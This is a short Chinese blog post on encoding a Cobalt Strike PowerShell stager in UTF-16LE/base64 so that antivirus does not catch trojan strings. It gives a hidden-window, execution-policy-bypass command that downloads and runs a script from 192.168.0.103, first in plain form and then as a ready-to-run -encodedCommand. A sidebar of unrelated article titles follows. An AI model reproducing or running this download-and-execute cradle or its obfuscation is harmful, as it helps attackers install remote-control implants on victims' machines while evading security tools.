当前位置:网站首页>powershell cs-UTF-16LE编码上线
powershell cs-UTF-16LE编码上线
2022-07-07 09:59:00 【kuxing_admin】
0x01前言
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线
0x02问题
1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=
2、原句子powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"
3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
主机上线
边栏推荐
- R語言使用magick包的image_mosaic函數和image_flatten函數把多張圖片堆疊在一起形成堆疊組合圖像(Stack layers on top of each other)
- 【滤波跟踪】基于matlab捷联惯导仿真【含Matlab源码 1935期】
- STM32F1与STM32CubeIDE编程实例-MAX7219驱动8位7段数码管(基于SPI)
- About how to install mysql8.0 on the cloud server (Tencent cloud here) and enable local remote connection
- [shortest circuit] acwing1128 Messenger: Floyd shortest circuit
- 【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)
- Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
- STM32入门开发 编写DS18B20温度传感器驱动(读取环境温度、支持级联)
- Flet教程之 15 GridView 基础入门(教程含源码)
- Learning notes | data Xiaobai uses dataease to make a large data screen
猜你喜欢
18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
Flet教程之 14 ListTile 基础入门(教程含源码)
一度辍学的数学差生,获得今年菲尔兹奖
Leetcode - interview question 17.24 maximum submatrix
聊聊SOC启动(七) uboot启动流程三
Complete collection of common error handling in MySQL installation
超标量处理器设计 姚永斌 第10章 指令提交 摘录
The running kubernetes cluster wants to adjust the network segment address of pod
Test the foundation of development, and teach you to prepare for a fully functional web platform environment
Rationaldmis2022 array workpiece measurement
随机推荐
LeetCode - 面试题17.24 最大子矩阵
Camera calibration (1): basic principles of monocular camera calibration and Zhang Zhengyou calibration
Network protocol concept
超标量处理器设计 姚永斌 第10章 指令提交 摘录
[Yugong series] go teaching course 005 variables in July 2022
About how to install mysql8.0 on the cloud server (Tencent cloud here) and enable local remote connection
Talk about SOC startup (VI) uboot startup process II
R语言使用magick包的image_mosaic函数和image_flatten函数把多张图片堆叠在一起形成堆叠组合图像(Stack layers on top of each other)
OneDNS助力高校行业网络安全
Distributed database master-slave configuration (MySQL)
请查收.NET MAUI 的最新学习资源
本地navicat连接liunx下的oracle报权限不足
Mastering the new functions of swiftui 4 weatherkit and swift charts
Reasons for the failure of web side automation test
STM32入门开发 NEC红外线协议解码(超低成本无线传输方案)
When sink is consumed in mysql, the self incrementing primary key has been set in the database table. How to operate in Flink?
.NET MAUI 性能提升
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
MATLAB實現Huffman編碼譯碼含GUI界面